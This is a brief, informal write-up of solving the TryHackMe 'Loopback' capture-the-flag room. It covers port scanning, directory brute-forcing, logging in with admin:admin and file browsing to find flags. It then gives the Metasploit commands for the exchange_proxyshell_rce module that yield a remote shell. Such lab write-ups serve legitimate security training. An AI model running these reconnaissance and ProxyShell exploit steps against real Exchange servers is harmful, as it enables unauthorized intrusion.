Hey, I am back with another write-up.
TryHackMe’s Loopback room was marked as easy but for me, it was between easy and medium.

This machine does not respond to ICMP
So ping won’t work
Let’s do nmap to see open ports and services
nmap -sC -sV <IP>

here are 4 open ports:
80 HTTP port
443 ssl/https
3389 ms-wbt-server
port 80 is not working, so let’s check port 443

Here we saw login id and password, but we don’t know any general id & pass are not working as well
Let’s look for subdomains
gobuster dir -u <URL> -w <Wordlist>

we found a couple of subdomains
let’s check /test

Here it is asking for an id and password let’s try admin: admin and we are in
and here we saw the first flag

on running ls command we got some error

after playing around with ls,dir, User\, I accidentaly hit * after User\ and got lot of access denied

after that, I tried Users\dev* and then Desktop and boom we found a user flag

here we saw a to-do list in which it is mentioned that they have to install an MS Exchange security patch
let’s start our msfconsole and check for MS Exchange payload

here we will be using 3rd one because we have a logon option and it’s rce too
now write the following command
use 3
(to use the 3rd payload)
show options
(to show the options for the payload)
set email <write the email which we found on Users/dev/Desktop/*>
set rhosts IP 'address of machine'
set lhost 'your IP'
run
Since it is showing not vulnerable to the CVE, that means we have taken the wrong payload

let’s try 6th one
use exploit/windows/http/exchange_proxyshell_rce
rest of the steps are the same as above
but it is showing payload aborted

note: it is showing payload aborted not ‘not vulnerable to the CVE’, which means it is vulnerable to CVE
let’s try for different emails
dev-infrastracture-team@thm.local got us in

use shell cmd to invoke the shell
and boom we in
after looking around we got a root flag

The room was nice I enjoyed doing this room
Happy Hacking!